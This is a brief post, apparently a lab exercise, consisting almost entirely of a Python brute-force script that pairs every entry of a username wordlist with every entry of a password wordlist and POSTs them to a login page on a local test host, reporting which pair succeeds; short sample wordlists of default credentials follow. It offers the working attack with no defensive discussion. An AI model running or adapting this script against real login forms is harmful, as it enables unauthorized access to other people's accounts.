Brute Force Login Attacks
2016-12-16 01:57:18
import urllib.request
import urllib.parse
loginFilePath = "login.txt"
passFilePath = "pass.txt"
def login_success(response):
return 'Account does not exist' not in str(response.read().decode('utf8'))
def try_this(idx1, idx2, _login, _pass):
req = urllib.request.Request(
'http://local.host/some_page/index.php?page=login.php',
data=urllib.parse.urlencode({
'username': _login,
'password': _pass,
'login-php-submit-button': 'Login'
}).encode('utf8'),
method='POST'
)
response = urllib.request.urlopen(req)
success = login_success(response)
if success:
print("Success:", idx1, idx2, _login, _pass)
else:
print("Error:", idx1, idx2, _login, _pass)
return success
with open(loginFilePath) as loginFile:
for idx1, _login in enumerate(loginFile):
with open(passFilePath) as passFile:
for idx2, _pass in enumerate(passFile):
_login = _login.strip()
_pass = _pass.strip()
success = try_this(idx1, idx2, _login, _pass)
if success: break
login.txt
admin
admin@admin
pass.txt
admin
pass123
123